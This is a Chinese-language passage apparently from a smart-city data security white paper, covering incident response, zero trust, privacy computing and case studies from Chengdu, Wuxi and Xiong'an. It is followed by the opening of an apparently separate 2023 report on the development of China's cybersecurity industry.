复阶段、跟踪阶段。 准备阶段:组建应急响应组织,熟练掌握应急响应制度,系统性识别运 行维护服务对象及运行维护活动中可能出现的风险,定义应急事件级别,制 定预案,开展培训和演练。这其中要求智慧城市参与真实网络攻防演练,全 面评估目标所在网络的整体安全防护能力。 检测阶段:进行日常监测,及时发现应急事件并有效预整,进行核实和 评估以规定的策略和程序启动预案,并保持对应急事件的跟踪。 抑制阶段:采取必要的应急调度手段,基于预案开展故障排查与诊断,对 故障进行有效、快速的处理降低影响,停止进一步损失,及时通报应急事件。 针对大型城市数据泄露事件,应急处置同时应上报上级机关和国家网络安全 主管单位,防止数据进一步泄露危害国家安全。 根除阶段:进一步分析信息安全事件,找出事件根因并彻底消除。包括 漏洞修复,人员培训,制度更新等。 恢复阶段:对系统数据损失进行容灾备份恢复,恢复系统的运行过程, 把受影响系统、设备、软件和应用服务还原到它们正常工作状态。 跟进阶段:总结经验持续监控,在日常运营中持续改进,提升系统安全 防护能力及人员应急响应能力。 图 8 数据安全应急响应流程 3. 智慧城市数据安全风险监测 (1)场景化数据安全风险监测 对敏感数据的流转场景,如敏感信息未脱敏、无认证访问行为、参数篡 改访问、低权访问高权业务、批量且高频地访问敏感信息和高频外发等进行 监测和审计,若违反预设监测模型的场景发生异常访问行为则进行告警及通 报。 (2)深度数据安全风险分析 基于异常行为规则和敏感信息访问规则,结合 UEBA (User and Entity Behavior Analytics ) 技术,实现用户异常行为及敏感信息访问分析、异常访 问分析和操作行为分析。结合前序、后续页面操作提升证据的准确性,可协 助定位安全事件,发现共享数据泄露源,协助用户进行业务止损。 4. 智慧城市数据安全风险评估 开展数据安全评估,涵盖数据安全合规评估、重要数据风险评估、个人 信息保护影响等,明确评估事项、评估团队和评估实施流程。对新业务上线、 业务重大变更、处理重要数据、处理敏感个人信息等满足条件的事项开展相 应数据安全评估,发现数据安全风险,制定有针对性的数据安全改进方案及 整体提升计划。 (五)智慧城市公共领域攻击防范 1. 网络攻击防范 网络安全是智慧城市建设的基础保障,没有网络安全,就没有数据安全。 智慧城市网络安全建设按照网络安全等级保护、关键信息基础设施安全保护 要求,构建符合网络安全等级保护三级及以上要求的安全防护体系,增强各 数据平台到智慧城市大数据平台的不同系统之间的安全防护能力,确保智慧 城市信息基础设施和公共支撑体系符合国家及行业相关安全要求。 图 9 智慧城市网络安全整体架构 合理规划安全域:智慧城市网络边界防护是构建智慧城市网络安全纵深 防御体系中的重要环节,防范非授权的访问、阻断非法入侵以及对恶意代码 的检测和防护等技术防护措施是保障智慧城市网络安全防护的基石。在智慧 城市网络安全建设时,需要合理划分逻辑区域,基于“零信任安全 ”一体化 全程可信防护架构,对不同区域边界采取安全防护措施,包括边界安全防护、 网络访问控制、入侵防范、恶意代码防范、异常流量清洗与防护等,实现在 源头对非信任用户进行网络访问隔离,构建无法抵赖、无法篡改、动态访问 控制的网络安全边界。 部署安全防护设备:在网络层面各公共领域访问流量应通过各项安全设 备的识别防护,包括安全策略防火墙、IPS 、WAF 、抗 DDoS 、邮件网关等设 备,可有效应对网络攻击、恶意代码、爬虫、DDoS 攻击、钓鱼邮件、APT 攻击等;服务器应部署服务器系统安全产品识别进程异常、病毒木马、勒索 攻击、恶意操作等风险;运维办公主机应安装杀毒软件和零信任系统,防止 从运维或访客通道传播病毒或恶意代码。 主从冗余网络系统:为提高智慧城市网络可用性,应部署冗余网络链路, 当发生网络故障时可自动切换为高可用网络链路;数据存储应搭配冗余备份 功能,当发生数据丢失时可快速恢复数据。 全链路日志分析:通过数据探针,在智慧城市系统各链路中监控网络、 应用日志。对日志的统一监控和分析有利于及时、完整地还原网络安全事件, 可以有效对安全攻击进行拦截和溯源。 2. 供应链应用安全 智慧城市信息系统涉及功能较多,技术较为复杂。在智慧城市业务发展 及能力生态的建设中, 由于涉及到众多的应用主体,为避免应用产品的恶意 漏洞以及供应链攻击所带来的损失。缓解整个智慧城市数据产品生命周期的 威胁。本文提出通过可监控和有效验证的数据应用安全方案。依照风险治理 思路,在软件应用安全治理方面,需要做到如下五个方面: (1)外防输入,做好软件引入及供应链产品的专项安全检查 智慧城市的软件引入要做到严进宽用,按照当前引入时间为起始点,去 除带有漏洞的软件版本,严格控制外部引入风险,认定后可认为引入的软件 是安全的,可供内部使用,直至曝出漏洞,对软件进行标记风险状态,进入 下一个循环。 (2)内控扩散,将安全管控融入智慧城市安全管理中 结合智慧城市管理建立供应商灰白黑名单机制,防范带有漏洞的软件版 本引入系统。针对曝出漏洞但未完成治理的软件或系统进行标记,严格安全 管控。同时智慧城市各子系统之间应做好逻辑隔离,防止恶意软件在系统之 间扩散。 (3)存量治理,结合智慧城市安全管理理清依赖,有序治理 智慧城市依赖系统较多,建设过程中会引入存量系统。因存量系统较多, 按照风险有限的原则,统筹考虑系统间的依赖关系,制定基础平台优先治理、 互联网应用重点治理等差异化的治理策略,分批次有序开展治理。 (4)持续监测,建立风险预警机制,保障供应链安全可控 智慧城市交付运行后,供应商应在智慧城市的生命周期内提供安全保障 服务,对产品漏洞及时修复;最终智慧城市也应根据供应商所提供管理手册 将供应链产品纳入企业资产管理定期对资产进行安全评估,结合漏洞预警, 对受影响的产品进行加固和修复。 (5)重视自研,建立软件研发框架,保障自研产品安全 在智慧城市信息系统的开发生命周期中,漏洞的引入不止有依赖的开源 组件、供应商等,还有开发人员编写的源代码漏洞。依照软件的开发和构建 过程,智慧城市信息系统需要从研发流程管控方面提升安全能力。系统开发 过程中,不规范的安全编码也会引入漏洞风险,如 SQL 语拼接所导致的 SQL 注入漏洞。 为降低开发过程中源代码漏洞的产生,提升源代码安全质量,可使用 SAST (Static Application Security Testing ,通常指静态源代码安全审计工具)在 开发 IDE 工具和持续集成过程中,对源代码进行安全扫描,或者使用 IAST (Interactive Application Security Testing, 通常指交互式安全测试工具)在系统运 行时通过污点分析检出源代码漏洞。 3. 数据交换安全 根据数据二十条数据处理者依法依规在场内和场外采取开放、共享、交 换、交易等方式流通数据,鼓励探索数据流通安全保障技术、标准、方案。 (1)零信任技术 智慧城市数据交换的设计基于零信任技术实现,既不信任网络内部和外 部的任何访问主体,采用以身份为基础,持续评估访问主体的风险,以动态 授予应用访问控制权限为核心,持续防护对接平台的双方安全。智慧城市零 信任总体架构设计应遵循以下原则: 持续风险评估:以访问主体的身份、行为、网络环境、终端环境等因素 进行持续风险评估,确保访问平台可信。 动态访问控制策略:建立基于风险评估的动态访问控制策略,主体访问 过程中持续评估主体风险并对动态授权。 应用与接口最小化授权:建立基于应用功能和 API 接口的细粒度授权体 系,数据平台对访问者开放满足最小权限原则所需的应用功能和接口权限, 收缩潜在攻击面。 功能与数据分离:数据平台应用分层解耦,将安全能力嵌入应用,建立 对数据授权的可信访问控制,实现应用嵌入式安全及纵深防御。 数据风险识别:对数据传输过程中的公开数据、敏感数据、加密数据、 攻击数据的风险进行识别,采用不同策略进行传输。采取安全算法对数据进 行加密传输。 (2)区块链可信技术 智慧城市数据安全区块链通过将数据存储在去中心化的区块链网络中, 实现了数据加密、去中心化存储、不可篡改三大功能,为数据安全提供了一 套可靠的分布式解决方案,具备高效、可信和安全的特点,用于智慧城市如 医疗、金融、交通等各个领域。 区块链可作为智慧城市数据安全的能力基础,对数据进行分布式治理, 并对数据开放行为进行监测,异常行为告警,全方位保障数据共享应用过程 中的风险可控。链上以协作节点为最小单位,为节点提供的原生的存证能力, 节点间的数据依靠开放策略管理、风险审计、数据开放血缘、流通水印溯源 关键技术,确保数据流通过程中的可信可证。 图 10 区块链可信能力 (3)隐私计算技术 隐私计算技术是一种在不暴露数据本身的情况下,对数据进行加密和计 算操作的技术, 旨在保护数据的隐私性。隐私计算技术的主要目的是使数据 在计算过程中保持加密状态,从而确保数据隐私性和安全性。在智慧城市的 建设中,隐私计算技术可以有效保护城市重要数据、个人隐私数据公开,提 高数据安全性。例如,对于人脸识别、车牌识别等场景,可以采用同态加密、 差分隐私、多方计算等技术,确保个人隐私不被泄露。 多种隐私计算能力以及区块链技术可以全方位支持数据公开安全,比如 多方安全计算(MPC)、联邦学习(FL)、可信执行环境(TEE)等能力。 在实际应用中,可信执行环境使用安全计算硬件,密文汇聚并进行加解密计 算,使原文不被任何第三方获取。 图 11 可信计算环境 多方安全计算可以实现数据不出域的情况下,对公开数据进行隐私计算, 将安全可信的结果提供给第三方。 图 12 多方安全计算 同时,对于单方数据查询需求,隐匿查询可以保证数据源无法确认查询 方实际查询对象,查询方无法获取到自己查询对象之外的信息。 图 13 隐匿查询 五、 智慧城市数据安全发展建议 (一)保障法律法规及基础安全标准落地实施 现有的法律法规正在逐步完善,《数据安全法》、《个人信息保护法》、 《关键信息基础设施安全保护条例》的颁布和实施,对城市管理者在数据安 全治理大方向上提供了重要指导,让数据安全工作做到了有法可依,更好的 组织开展数据安全相关领域的工作。智慧城市管理者应严格遵守国家及地方 法律法规要求,落实等级保护测评、关键基础设施测评等相关工作。 “智慧城市数据安全 ”国家标准体系仍待完善,需加快推进相关标准规 范的制定。国家层面应以处理周期数据安全为目标,做好分类分级、风险评 估、技术要求等基础标准的制定,并持续推动智慧城市数据安全国标标准化 工作,提升国家标准化水平。 (二)推进智慧城市数据安全技术和人才发展 智慧城市建设的背后,有着众多技术的支撑,随着前沿技术进步,6G 、 云计算、人工智能等新技术的应用,网络架构、网络边界不断发生变化,新 型的网络攻击手段,如高级持续性威胁(APT)网络攻击、基于 AI 的网络对 抗时有发生,安全防御技术能力提升需要新的防护技术研究。数据处理周期 从收集到销毁,每一个环节都有对应的安全手段进行防护,如隐私计算、量 子加密,这些新防护技术使得数据交互使用效率提升的同时,保障了安全性 和隐私性。 同时智慧城市涉及多角色运营,鼓励相关单位制定人才培训计划,建立 人才培训基地,开展智慧城市深度耦合的数据安全人才培养,增强数据安全 技术赋能。 (三)强化智慧城市数据安全运营和管理水平 智慧城市建设过程中产生大量数据资产,而要最大化发挥数据资产的价 值,则重在数据运营。通过数据运营快速响应业务需求、驱动业务持续改进, 从而推动智慧城市高效协同发展。作为智慧城市的负责方应建立完善的数据 治理框架、整理运营方组织架构、明确各角色责任义务、制定数据运营计划 等。建立起综合数据平台,整合智慧城市各个组织的数据,以便更好地管理 和分析数据,积极推行数据开放与共享,同时加强数据安全措施,确保数据 隐私和安全性得到保障,通过科学的运营和管理将数据发展成为智慧城市可 持续发展的重要因素。 参考文献 [1] 唐斯斯,张延强,单志广,等. 我国新型智慧城市发展现状、形势与政策建议[J]. 电子 政务,2020(4):70-80. DOI:10. 16582/j.cnki.dzzw.2020.04.007. [2] 国家智慧城市标准化总体组.《智慧城市标准化白皮书(2022 版)》[J]. 信息技术与 标准化, 2022(8). [3] 国务院关于印发“十四五 ”数字经济发展规划的通知[J]. 中华人民共和国国务院公 报,2022(03):5- 18. [4] 刘晶. 智慧城市数据管理的“韧 ”与“柔 ”[N]. 中国电子报,2022-01- 18(006).DOI: 10.28065/n.cnki.ncdzb.2022.000067. [5] CEATI 联盟,奇安信行业安全研究中心,安全内参,等.《中国政企机构数据安全风险 分析报告》[R/OL],2022(11). [6] 金双民,郑辉,段海新. 僵尸网络研究系列文章之一 僵尸网络研究概述[J]. 中国教 育网络,2006,06:51-54. 附录一 智慧城市数据安全实践案例 (一)智慧蓉城数据安全建设实践 1. 背景与需求 贯彻落实习近平总书记“一流城市要有一流治理,要注重在科学化、精 细化、智能化上下功夫 ”指示精神,成都市市委、市政府以大运会保障为契 机,以“智慧蓉城 ”运行中心建设为切入点,加快推进城市运行“一网统管 ” 建设,进一步推动超大型城市的安全运行、服务完善、科学治理。 工作部署强调在 2022 年 6 月前,建成投用“智慧蓉城 ”运行中心,形成 与“智慧蓉城 ”运行中心配套的政务值守、运行监测、风险预警和指挥调度 管理体制,初步实现城市运行实时监测分析预警、突发事件高效协同处置。 2. 建设方案 (1)方案设计 本项目内容主要包括数据安全治理服务、基础安全防护服务和安全基础 设施服务等三大类内容: 数据安全治理服务。主要包括数据安全管理体系建设服务、数据资产梳 理服务、数据安全风险评估服务、数据访问权限稽查服务、数据安全策略管 理服务、数据安全风险监测及告警服务、数据安全溯源分析服务、数据安全 应急响应及处置服务。 安全基础设施服务。通过打造一体化、开放性的威胁情报中心,实现对 智慧蓉城基础安全防护节点(设备)的赋能,提升威胁识别预警能力;构建 基于隐私计算技术的数据分析运用平台,促进智慧蓉城重要敏感业务数据高 效流通。 基础安全防护服务。主要包括 API 接口审计服务、全流量探针服务、APP 评估及加固服务、威胁诱捕服务、零信任运维服务、红蓝对抗服务、安全检 查服务、系统接入安全评估、安全培训、区块链平台安全监测、区块链风险 评估和安全保障体系评估服务等内容。 (2)总体框架 智慧蓉城网络安全运营保障中心采用“4+1+2+2+8 ”的安全架构模式,具 体如图 14 所示: 图 14 智慧蓉城网络安全运营保障中心安全架构 “4 ”表示构建和完善四大安全体系。其中数据安全治理平台对智慧蓉城 大数据业务起到全生命周期的数据防护,对数据的收集、传输、存储、使用、 交换、销毁全周期各环节进行数据防护。数据治理平台与安全管理中心、威 胁情报中心、密码基础设施并列成为四大体系。 “ 1 ”表示构建一个以“智慧蓉城运行管理平台安全中心 ”为核心的新一 代网络安全运营保障中枢,通过本次项目将智慧蓉城网络安全综合防御能力 和运营保障水平全面提升到一个新高度,形成智慧蓉城运行管理平台安全中 心的综合立体防控体系。 “2 ”表示面向智慧蓉城的业务系统、云平台、数据平台、网络平台等关 键信息基础设施,以安全“高标准合规要求 ”和“业务风险挑战 ”为双轮驱 动,积极推动等级保护、关键信息基础设施安全保护、数据安全保护以及密 码应用安全保护等新制度、新标准、新规范、新要求的全面落实。 “2 ”表示以“安全运营 ”为核心理念,通过“基础安全防护体系 ”和“数 据安全治理体系 ”两大安全服务体系助力智慧蓉城全面完善并落实安全防护 举措。 “8 ”表示通过“基础安全防护体系 ”和“数据安全治理体系 ”两大安全 服务体系全面提升智慧蓉城业务场景所需的“安全识别、安全防护、安全检 测、安全分析、监测预警、追踪溯源、事件处置、快速恢复 ”八大能力,确 保整体实现“实战化、体系化、常态化 ”的安全新理念以及“策略可统筹、 场景可编排、资源可调度、资产可探查、事件可监控、风险可呈现、指标可 量化、行为可稽核 ”的安全新目标。 3. 建设成果 (1)数据安全合规保障 满足安全保障工作合规:充分贴合智慧蓉城运行管理平台及配套支撑系 统实际需要,按照《网络安全法》《数据安全法》《个人信息保护法》《关 键信息基础设施安全保护条例》《密码法》等法律法规合规要求,落实网络 安全“三同步 ”原则,实现智慧蓉城配套设施安全合规保障。 提升系统安全保障能力:基于系统平台的安全风险分析,从原有的基础 安全的安全架构、合规防御,提升至积极防御和情报协同阶段;重点加强智 慧蓉城数据安全治理,保障数据及隐私安全。 促进业务数据高效流通:针对重要敏感政务数据,利用隐私计算、边缘 计算等技术,实现重要敏感政务数据可用不可见,促进政务数据高效流转, 加快智慧蓉城运行管理平台及配套支撑系统应用步伐。 (2)解决数据共享场景安全 智慧蓉城业务场景以智慧蓉城运行管理平台为中心,再细分为中间的融 合服务平台、数据交换共享平台和物联感知平台,这三个中间平台直接为智 慧蓉城运行管理平台提供数据及业务服务;各个系统平台关注的安全点各有 侧重。其中数据交换共享平台关注数据共享安全和数据开放安全。在此项目 中主要通过隐私计算手段解决数据共享安全。 隐私求交服务:针对持有各自集合的多参与方来共同计算各有数据集合 的交集运算。在协议交互的最后,一方或是多方得到正确的交集,而且不会 得到交集以外任何其他方集合中的任何信息。 隐匿查询服务:针对查询方向数据提供方查询信息,同时保护查询方的 查询意图和数据提供方的数据明细信息。 联合统计服务:在保护各方数据隐私的前提下,利用多方数据进行联合 统计分析。各方本地数据及算法参数对其他方和隐私计算平台保密,结果使 用方只得到统计结果,得不到任何其他信息。 联合建模服务:结合多方数据进行模型训练,支持联合建模的数据对齐、 特征工程、模型训练、模型评估、推理预测等过程。结合密码安全协议,防 止模型训练过程中泄密原始数据和模型梯度数据,优化计算策略和计算架构, 提升联合建模的效率。 通过隐私计算服务提供的联邦学习、多方安全计算等技术,实现破除各 部门之间的数据壁垒,打通数据安全融合应用通道,促进数据要素价值最大 化。 (二)无锡智慧城市大数据局数据安全建设实践 1. 背景与需求 贯彻落实国家大数据发展体系要求,无锡智慧城市大数据管理局成立至 今,深度挖掘大数据价值,积极开展大数据治理业务,其信息基础设施达到 国内领先水平、数据共享开放水平走在国内前列。随着无锡新型智慧城市建 设推进,基于数据共享和流程变革的智慧城市管理服务不断投入运营,极大 地提升了社会管理服务运行效率,但数据在整合共享过程中也面临着数据处 理合规、人员监管合规、数据流转合规等安全风险。 2. 建设方案 针对以上情况,建设方案如图 15 所示。 图 15 无锡市数据安全体系建设方案 (1)数据安全管理组织建设 建立数据安全管理的组织架构,明确数据安全管理人员职责权限及各个 环节运行沟通协作机制。 (2)数据安全制度流程建设 建立健全覆盖数据全生命周期的安全管理制度规范,使数据安全管理组 织管理有规范可循,有流程可依。 (3)数据安全管理平台建设 建设覆盖数据安全管理全链条的数据安全管理平台,对数据安全操作行 为进行有效管控,对数据安全信息进行研判、预警、展示和处置。 (4)数据安全技术体系建设 规划大数据中心所有安全域,采用数据加解密系统、数据防泄露、数据 堡垒等多种技术和工具,全面建立大数据中心安全技术体系。 建设成果如图 16 所示: 图 16 数据安全体系建设方案 (5)建立数据安全运营体系 建立专业的数据安全运营队伍,借助数据安全管理平台,配套数据梳理 服务、安全分析服务、数据安全风险评估服务、数据安全体系咨询服务、数 据安全售后服务,打造城市大数据中心数据安全的整体运营工作。 3. 建设成果 (1)解决多场景下的数据安全问题 数据安全治理场景: 以数据安全管理平台为核心,整合数据安全技术能力,构建数据安全运 营体系。 由数据安全治理平台对数据资产自动发现并分级分类,根据不同场 景的安全需求和安全风险,统一制定安全策略并调配底层能力组件,实现数 据全生命周期管理。 建立数据安全运营团队,依托于数据安全治理平台及数据安全技术工具, 建立数据安全运营体系,实现数据安全事件预警和一体化防护的运营服务, 提高应对突发重大安全事件的应急处理能力,形成事前预警通报,事中防护 应急,事后监督整改的闭环,驱动数据安全建设进入“智能分析 ”时代。 数据安全运维场景: 城市大数据中心运维组织由市大数据管理局工作人员和运维团队组成, 为加强安全监管,需要对系统的所有用户构建以身份为中心的运维管理机制, 建立登录与访问授权相结合的管理机制,运维用户必须经过数据安全堡垒中 心认证后,方可访问经授权的目标设备、系统、数据库。主要采用身份认证、 授权控制、访问控制、操作审计、安全培训等手段来保障数据安全运维。 (2)全方位的数据安全体系建设 实现数据安全的多维度体系:敏感数据识别、数据资源分类分级、敏感 数据安全传输。 建立了数据安全管理和运营体系,管理无死角,技术防得住。 成为首个通过数据安全能力成熟度(DSMM)三级认证的政务数据中心。 (三)雄安新区容东城市运营管理中心 1. 背景与需求 雄安新区着力打造北京非首都功能集中承载地,起步区、启动区正在扎 实推进。容东片区是雄安新区开发建设的先行区,担负着首期居民征迁安置, 为起步区、启动区开发建设提供支撑的重要功能。容东城市运营管理中心综 合管理平台是河北雄安新区建设的第一个数字化、网络化、智能化的城市运 营管理平台,为容东社区打造跨部门、跨层级、跨区域的协同运行体系。容 东城市运营管理中心综合管理平台在 2022 年 7 月建成投入使用,配合雄安新 区政府以及业主方成功完成攻防演练以及安全测试,推动容东片区数字经济 高质量发展,打造雄安新型智能化城市运营管理先行示范区。 2. 建设方案 (1)明确区域边界,建立安全的物理环境 容东城市运营管理中心综合管理平台主要承载:城市概况视频数据、智 慧社区数据、智慧环卫数据、道路交通数据等多个领域的业务信息。 数据安全架构设计如图 17 所示,容东城市运营管理中心综合管理平台分 为互联网接入区、政务外网接入区、块数据区域、管委会客户端等区域,该 系统对接雄安云服务,更好的促进资源集聚,共享及应用管理。 图 17 容东城市运营中心网络架构图 互联网接入区的主要功能是跟外界互联网联接,提供对外服务。容东城 市运营管理中心综合管理平台的门户代理放在了此区域。门户代理 Nginx 网 关承载了互联网过来的所有流量,作为互联网访问系统的唯一入口。 政务外网接入区是跟外界互联网完全物理隔离的网络,不能通过策略或 者安全组打通到外界互联网通道,存放在此区域的设备,用于提供视频中台、 流媒体网关、统一门户、技术中台、大数据中台等一系列的服务。 块数据区域提供了所有数据存放的地址。包括 MySql 数据库、Redis 数据 库、以及 Hadoop ,HDFS 大数据组件等。系统产生、调用等数据均会存放于 此区域中。 管委会客户端,容东管委会现场通过物理专线直接访问云上服务器,查 看大屏服务内容等。 (2)建立安全管理制度、安全的管理中心 在安全管理制度中,制定了《河北雄安新区容东管理委员会信息安全方 针》,文件中明确了制度的适用范围、 目的、基本原则、总体目标、安全框 架等内容。制定了《河北雄安新区容东管理委员会信息安全管理制度》、《河 北雄安新区容东管理委员会网络安全管理制度》、《河北雄安新区容东管理 委员会系统安全管理制度》等制度,制度内容包含网络安全、系统安全、信 息安全等各方面的管理内容,涵盖安全管理策略、管理制度、操作规程、记 录表单等安全管理制度体系。制定了《河北雄安新区容东管理委员会制度制 定和发布办法》。设立特定的数据安全管理人员岗位,明确了各岗位职责, 负责容东运营管理中心数据安全项目的建设、运行、管理、数据资产统计、 业务数据保护、数据库审计、数据安全分析等工作。 (3)建立安全的运营体系 在安全运营运维管理中,建立了《河北雄安新区容东管理委员会办公环 境安全管理制度》、《河北雄安新区容东管理委员会资产安全管理制度》、 《设备管理制度》、《账户权限、 口令管理制度》、《恶意代码防范管理制 度》、《系统变更管理制度》、《备份和恢复管理制度》、《安全事件报告 和处置制度》、《网络安全工作应急预案》等制度,相关制度中包含介质管 理、资产管理、系统设备运维、系统数据安全、数据备份,网络安全应急响 应的等相关管理内容。 运营运维人员操作系统有具体的规范,使用堡垒机等硬件设备进行登录 操作,堡垒机预制浏览器和管理工具可对运营运维管理人员的操作进行审计 记录。设计并分配管理人员权限和数据访问权限,使正确的数据被正确的人 操作。云平台提供日志审计能力,系统相关日志信息统一发送到云平台的日 志审计设备, 日志存储时间不少于 6 个月。系统部署在雄安云资源池,云平 台部署有入侵检测系统,可对网络中发生的安全事件进行检测、防御并向管 理员报警。 3. 建设成果 容东城市运营管理中心运营管理系统部署在雄安云网络环境,雄安云计 算基础架构的安全技术聚焦在计算资源池、网络资源池和云管理平台三个层 面。 具体到网络拓扑层面,容东城市运营管理中心平台已划分成互联网区、 政务外网接入区、块数据区三个区,第一步在三个大区之间通过安全组和对 等连接实施逻辑隔离,第二步按照系统数据安全标准,采用白名单形式,实 现数据共享;在互联网的出口,通过链路负载、下一代防火墙、WAF 、防病 毒网关等安全设备构建安全边界。 容东城市运营管理中心平台安全系统在建成之后运转正常,并配合雄安 新区政府以及业主方进行了攻防演练以及安全测试,在此期间很好的完成了 安全考验,在之后的试运行阶段,配合等保公司进行了等保测试,并完成了 漏洞修复工作。保障数据在生命周期各层级的安全,无数据安全事件发生。
standards
一、2023 年网络安全产业发展面临的新形势 2023 年,世界百年未有之大变局加速演进,在通胀压力 继续攀升、地缘政治冲突升级、供应链挑战加剧等多重冲击 下,全球经济增长乏力,网络安全产业发展面临的国际形势 依然复杂严峻,网络安全成为大国角力和科技竞争主攻方向 的趋势更加明显。从国内看,2023 年是全面贯彻落实党的二 十大精神的开局之年,随着疫情防控平稳转段,我国国民经 济持续恢复,网络安全产业逐步恢复稳定增长的发展态势。 在网络安全法律体系更趋完善、政策愈加落地,以及技术迭 代、数字经济注入新发展动力的加持下,网络安全产业应对 国际变局动荡的心态更稳、能力更强,从政府到企业凝聚合 力、攻坚克难、开拓创新,正加快构筑产业发展新优势,共 同夯实网络空间命运共同体的安全基石。 (一)发展机遇 1. 网络安全治理日臻完善,产业发展更加有据可依 一是法律法规趋严趋细,合规要求更加全面深入。近年 来,随着关键信息基础设施安全保护、网络安全审查、云计 算服务安全评估、数据安全管理、个人信息保护等领域一系 列法律法规相继出台,我国网络安全法规体系的“ 四梁八柱” 基本建成。2022 年以来,网络安全治理更加全面深入,国家 在一体推进网络安全立法、执法、司法、普法道路上不断向 前迈进。2022 年第四季度,《网络安全法》首次修订,对违 反网络运行安全一般规定和网络信息安全法律责任制度进 行了调整,增加了从业禁止措施,网络空间治理法治化依据 更加明确;《反电信网络诈骗法》正式施行,针对电信网络 犯罪行为构建全方位治理体系。《未成年人网络保护条例(草 案)》修改审议,加快步入立法进程;《商用密码管理条例》 发布并施行,在《密码法》框架下完善了商用密码有关的系 列重要制度;《网信部门行政执法程序规定》发布,对进一 步规范和保障网信部门依法履行职责、实施行政执法等方面 提出要求。此外,线上金融服务的合规监管日益严格,泸州 银行泸贝尔 APP、山西银行 APP、兰州银行 APP 等超十家 银行 APP 因侵犯用户权益、违规获取个人信息,被有关部门 点名通报和限期整改。 二是政策标准密集发布,行业健康规范发展生态更加健 全。《关于促进网络安全保险规范健康发展的意见》《关于 推进 IPv6 技术演进和应用创新发展的实施意见》《关于开展 网络安全服务认证工作的实施意见》等政策为规范网络安全 行业细分领域提出了具体要求;在互联网信息服务、互联网 广告、证券期货业、寄递服务、在线旅游、政务大数据等重 点行业提出了网络安全管理具体措施(详见附件一)。《生 成式人工智能服务管理暂行办法》发布,对生成式人工智能 技术的发展与治理做出明确规定。首个关键信息基础设施安 全保护的国家标准《信息安全技术 关键信息基础设施安全 保护要求》正式实施,《汽车整车信息安全技术要求》等强 制性国家标准征求意见,生成式人工智能数据安全规范、大 型网络平台网络安全评估指南、数据分类分级保护要求等标 准列入 2023 年度网络安全国家标准计划,工业互联网、车 联网密码支撑标准体系建设指南发布,在助推网络安全产业 高质量发展方面的基础性、规范性、引领性作用更加凸显。 2. 网络安全技术加快迭代升级,为产业发展注入更强 动力 近年来,全球持续加大对新兴技术的投资和研发力度, 零信任、生成式人工智能、量子信息技术等网络安全技术布 局及应用持续提速。2022 年以来,零信任架构加快落地,美 国正式发布《国防部零信任战略》, 将零信任部署为网络安 全最高优先事项,美网络安全和基础设施安全局(CISA)发 布零信任成熟度模型第二版,更新了政府范围内采用零信任 安全架构的关键定义和指标。随着美国开放人工智能公司 (OpenAI)推出了聊天生成预训练转换器(ChatGPT)并在 全球范围内广泛应用,生成式人工智能(AIGC)再次成为焦 点,谷歌、微软、百度、阿里、科大讯飞、腾讯等企业相继 推出应用 AIGC 和大语言模型技术产品。在网络安全领域, AIGC 技术浪潮加快了网络安全知识和经验的大规模复制速 度,提升了安全代码生成、智能研判等领域的实现效率,为 数据安全防护路径提供新的解决思路。2023 年,以量子计算、 量子通信为代表的量子信息技术(QIS)逐步由实验阶段走 向落地应用,为网络安全技术的发展注入新动力,美德等国 家均加快研究不受量子技术攻击的加密技术以保障网络通 信安全;我国首个量子通信领域国家标准《量子保密通信应 用基本要求》发布,有关量子信息技术应用有望加速落地。 全球范围内网络安全技术迅速迭代升级和推陈出新进而产 生的知识和技术外溢对网络安全产业的创新发展产生客观 的推动作用,同时也倒逼国内企业和研究机构在重点领域和 细分环节加快技术突破、专利布局和标准转化,打造更强技 术优势。 3.数字安全再提层级,数据安全产业将迎来爆发期 近一年来,数字安全国家立法和战略规划并行推进,《中 华人民共和国数字经济促进法(专家建议稿)》的公布标志 着数字经济启动首次立法,即将步入有法可依的新阶段;《数 字中国建设整体布局规划》正式发布,提出夯实数字基础设 施和数据资源体系“ 两大基础”,强化数字技术创新体系和数 字安全屏障“ 两大能力”,将数字安全提高到战略层级; 中共 中央、国务院印发《关于构建数据基础制度更好发挥数据要 素作用的意见》(简称“ 数据二十条” ),从数据产权、流通 交易、收益分配、安全治理等方面构建数据基础制度;《工 业和信息化部等十六部门关于促进数据安全产业发展的指 导意见》聚焦数据安全保护及相关数据资源开发利用需求, 明确了发展目标和重点任务,为产业发展规划出清晰路线 图;《数据出境安全评估办法》规定了数据出境安全评估的 范围、条件和程序,为数据出境安全评估工作提供了具体指 引,体现出维护数字安全的国际视角。此外,国家数据局的 组建有利于加快国内数据流通,有助于快速推进数据要素市 场建设。可以预见,在数字安全相关制度建设和机构建设日 趋完备的“双轮” 驱动下,相关行业对数据安全的投入将持续 增加,数据安全产业将迎来增长爆发期。 4.全球网络安全战略布局加快,对产业提出更高要求 2022 年下半年以来,美国陆续发布《2023—2025 年战 略计划》《国家网络安全战略》《2023 年美国防部网络战略》 《美国政府关键和新兴技术国家标准战略》等政策文件,从 网络空间安全、关键信息基础设施安全、数字安全等方面提 出具体的战略举措, 强化网络安全保护和网络空间作战能 力。欧盟陆续发布《网络弹性法案》《关于在欧盟全境实现 高度统一网络安全措施的指令》(NIS 2 指令)、《关于 GDPR 下的个人数据泄露通知的第 9/2022 号指南》《网络团结法案》 等法律法规,力图通过强监管巩固网络安全管理和网络空间 防御。美欧在网络安全领域的系列战略举措显示了其在强化 网络空间防御、提高关键信息基础设施安全水平、加强数字 监管等方面的决心,预计后续将陆续推出的具体措施将显著 增强其维护国家网络安全,打击所谓“敌对势力”,限制竞争 对手发展的能力,这给我们敲响警钟;另一方面,我国“ 出海” 企业将面临更高的合规要求,在满足数字合规、合法权益维 护、保持业务安全不宕机等方面需要增强投入。要实现以上 两点,需要加强研判,提前布局。 (二)面临挑战 1.全球经济下行削弱政府财力和企业盈利能力, 网络 安全产业受到冲击 2023 年,通胀压力继续攀升,全球经济步入中低速增长 轨道。世界银行的预测显示,全球增长预计将从 2022 年的 3.1%放缓至 2023 年的 2.1%。美欧等发达经济体的银行业危 机发酵,金融形势险象环生,信贷条件日趋收紧,新兴市场 和发展中经济体当中有四分之一实际已无法通过国际债券 市场融资1。从国内看,疫情防控平稳转段后,我国经济恢复 呈现波浪式发展、曲折式前进的过程。宏观经济表现不佳削 弱了政府财力,压缩了企业盈利空间,政府和企业在网络安 全方面的投入不可避免地受到波及,给网络安全业务拓展和 产品交付造成了较大的负面影响。大量企业在网络安全建设 上“ 有心无力”,基础网络业务影响较大,部分企业经营困难, 再加上政府和企业在网络安全方面的预算和投入普遍降低 1《世界银行: 2023 年 6 月全球经济展望报告》 https://finance.sina.com.cn/tech/roll/2023-06-08/doc-imywpprq9744526.shtml 